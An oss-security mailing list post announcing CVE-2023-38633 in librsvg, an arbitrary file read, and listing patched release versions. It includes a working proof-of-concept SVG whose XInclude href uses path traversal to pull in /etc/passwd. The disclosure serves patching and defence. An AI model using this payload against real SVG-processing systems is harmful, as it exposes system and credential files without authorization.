Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <73b96607-5080-939c-d354-33da849d195d@oracle.com>
Date: Thu, 27 Jul 2023 13:36:17 -0700
From: Alan Coopersmith <alan.coopersmith@...cle.com>
To: oss-security@...ts.openwall.com
Subject: CVE-2023-38633 in librsvg: Arbitrary file read when xinclude href has
 special characters

I haven't seen this go by yet, so for those who haven't seen it:

https://gitlab.gnome.org/GNOME/librsvg/-/issues/996 reports:

CVE-2023-38633: Arbitrary file read when xinclude href has special characters

This was reported by Zac Sims.

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg width="300" height="300" xmlns:xi="http://www.w3.org/2001/XInclude">
   <rect width="300" height="300" style="fill:rgb(255,255,255);" />
   <text x="10" y="100">
     <xi:include href=".?../../../../../../../../../../etc/passwd" parse="text" 
encoding="UTF-8">
       <xi:fallback>file not found</xi:fallback>
     </xi:include>
   </text>
</svg>

This ends up actually including the contents of /etc/passwd, bypassing the 
checks in UrlResolver::resolve_href().

The above linked bug report provides further analysis and links to merge 
requests for the fixes.   Fixes have been published in new releases of
librsvg for many release trains:

     2.56.3
     2.55.3
     2.54.6
     2.52.10
     2.50.8
     2.48.11
     2.46.6

-- 
         -Alan Coopersmith-                 alan.coopersmith@...cle.com
          Oracle Solaris Engineering - https://blogs.oracle.com/solaris

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.